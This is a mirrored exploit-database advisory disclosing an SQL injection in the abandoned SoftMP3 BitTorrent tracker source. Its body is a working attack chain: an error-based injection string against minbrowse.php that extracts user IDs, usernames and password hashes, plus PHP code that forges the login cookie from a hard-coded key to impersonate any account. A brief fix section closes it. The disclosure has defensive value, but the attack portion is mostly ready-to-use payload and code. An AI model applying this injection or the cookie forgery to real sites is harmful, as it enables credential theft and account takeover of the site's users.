SoftMP3 – SQL Injection

• Exploit Database
• 90 阅读

• 作者： mArTi
  日期： 2011-04-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17209/

• # Exploit Title: SOFTMP3 source code SQL injection
  # Date: 23/04/2011
  # Author: mArTi
  # Software Link: http://softmp3.org/
  # Version: No others versions available...
  # Tested on: Windows / Unix
  
  /.................................../ Introduction /.................................../
  
  SoftMP3 released a source code of its bittorent tracker when it died. This source code is vulnerable to a SQL injection.
  Here's the PoC and the Fix
  
  /.................................../ PoC /.................................../
  
  -> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
  
  -----> Then you can use this to connect as the user you want by the passhash you got and setting the following cookies :
  
  uid=id
  pass=encrypted passhash (see down)
  
  
  ---------> getting encrypted passhash to connect with the cookies
  <?php
  $test=md5($HTTP_SERVER_VARS["REMOTE_ADDR"]."passhash"."hejsan".$HTTP_SERVER_VARS["REMOTE_ADDR"]);
  echo "pass cookie is $test"
  ?>
  
  /.................................../ FIX /.................................../
  
  Delete /minbrowse.php (useless).
  
  BTW, if you want to protect the cookies, just change the cookie encryption in bittorent.php file (like the "hejsan" key or the order of terms in encryption)
  
  
  
  -------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
  Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me.
  -------------------------------------------------------- -------------------------------------------------------- -------------------------------------------------------- --------------------------------------------------------
  

  Python

  Copy